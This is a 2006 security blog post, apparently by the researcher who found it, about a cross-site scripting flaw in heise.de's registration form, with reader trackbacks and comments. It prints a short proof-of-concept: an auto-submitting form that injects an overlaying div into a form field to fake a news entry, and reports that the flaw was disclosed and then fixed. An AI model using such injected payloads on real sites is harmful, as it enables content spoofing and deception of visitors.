How-to fake heise news entries
(Tuesday, September 5. 2006)
As I already mentioned in a previous blog posting titled XSS on heise.de there was a XSS vulnerability on heise.de. I informed heise's webmaster about this bug on December 23, 2005 and received the answer mail which stated that this issue was addressed on January 06, 2006. It's almost unbelievable that this bug is still present to this day.
Yesterday heise.de reported a XSS vulnerability on the German federal government's website which could be used to create forged news entries. Therefore I decided to use the bug on heise's website to create my own heise news entry.
The XSS bug is located in heise's registration script. We are able to insert arbitrary code after the (on the image) marked form elements.
We can easily comment out the text and HTML elements after the form elements but how should we replace the text and elements above the form elements? In fact it is very easy. We just define a new div element which is positioned absolute and overlaps the original text.
As a result of the usage of relative line item specifications the div element does not cover the original text neat if we resize the browser's window.. but this code is only a quick and dirty PoC.
Complete Heise Fake News PoC code.
Update: 2006/09/06
I informed Heise about this vulnerability again and they fixed it immediately.
Heise Registration Forms
We can easily comment out the text and HTML elements after the form elements but how should we replace the text and elements above the form elements? In fact it is very easy. We just define a new div element which is positioned absolute and overlaps the original text.
As a result of the usage of relative line item specifications the div element does not cover the original text neat if we resize the browser's window.. but this code is only a quick and dirty PoC.
<form method="post" action="http://www.heise.de/registration/" name="heise">
<input type="text" name="uid" size="20" value=''>
<input type="text" name="vorname" size="20" value='<div style="position:absolute; top:5%;left:12%; width:73%;height:120%; background:#fff;">[...]</div> <!--'>
<input type="text" name="name" size="20" value=''>
</form>
<body onload="heise.submit();">
Complete Heise Fake News PoC code.
Heise Fake News
Update: 2006/09/06
I informed Heise about this vulnerability again and they fixed it immediately.
Trackbacks
Trackback specific URI for this entry
No Trackbacks
Comments
Display comments as
(Linear | Threaded)
Don't trust the Austrians!!!!1111...
Thomas, an austrian friend of mine, just sent me this information about an XSS weakness on heise.de, the german IT-Bildzeitung. Thomas tried to inform the webmasters of heise.de a few months ago … but nothing happened.
Yesterday heise.de reported...
Thomas, an austrian friend of mine, just sent me this information about an XSS weakness on heise.de, the german IT-Bildzeitung. Thomas tried to inform the webmasters of heise.de a few months ago … but nothing happened.
Yesterday heise.de reported...
How to fake heise.de new entries...
Thomas Waldegger (aka morpheus) found a XSS vuln. on heise.de which he already reported end of last year and which should be fixed since beginning of this year.Well- doesn't seems so Read more here.
...
Thomas Waldegger (aka morpheus) found a XSS vuln. on heise.de which he already reported end of last year and which should be fixed since beginning of this year.Well- doesn't seems so Read more here.
...
Heise.de hacked ;)...
Hrhr, heise.de, which reported on the cross-scripting vulnerability on bundesregierung.de a few days before, got hacked itself.
Morph3us shows in his blog in a simple proof-of-concept code which explains how you can add customized news on heise.de on y...
Hrhr, heise.de, which reported on the cross-scripting vulnerability on bundesregierung.de a few days before, got hacked itself.
Morph3us shows in his blog in a simple proof-of-concept code which explains how you can add customized news on heise.de on y...
"It's hardly unbelievable"?
Jedenfalls ist das Problem jetzt wirklich behoben.
Jedenfalls ist das Problem jetzt wirklich behoben.
Thanks. I corrected the sentence.
btw: Google search: 'hardly unbelievable'
lol. (o:
btw: Google search: 'hardly unbelievable'
lol. (o:
[…] das sogar ein noch gröberes Loch vom Blogger auf Morph3us gefunden wurde.. smile Hier mehr => http://morph3us.org/blog/?p=41 Test gefällig? => […]